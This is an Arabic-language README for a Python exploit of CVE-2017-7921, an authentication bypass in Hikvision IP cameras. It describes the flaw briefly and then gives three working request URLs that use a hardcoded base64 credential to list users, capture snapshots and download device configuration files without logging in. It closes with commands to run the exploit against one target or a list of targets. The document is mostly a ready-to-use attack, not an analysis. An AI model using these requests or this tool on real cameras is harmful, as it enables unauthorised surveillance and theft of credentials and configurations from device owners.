
استغلال مكتوب بلغة Python لثغرة CVE-2017-7921 في كاميرات Hikvision IP، ينفذ تعداد المستخدمين دون مصادقة، والتقاط لقطات الشاشة، وتنزيل ملفات الإعداد عبر طلبات HTTP مصممة خصيصًا.
تم اكتشاف مشكلة مصادقة غير سليمة في أجهزة Hikvision.
تحدث ثغرة المصادقة غير السليمة عندما لا يقوم التطبيق بمصادقة المستخدمين بشكل كافٍ أو صحيح.
قد يسمح هذا لمستخدم ضار بتصعيد صلاحياته على النظام والوصول إلى معلومات حساسة.
https://seclists.org/fulldisclosure/2017/Sep/23
تفاصيل الثغرة:
----------------------
استرجاع قائمة بجميع المستخدمين وأدوارهم:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
الحصول على لقطة من الكاميرا دون مصادقة:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
والأسوأ من ذلك كله، يمكن تنزيل إعدادات الكاميرا:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
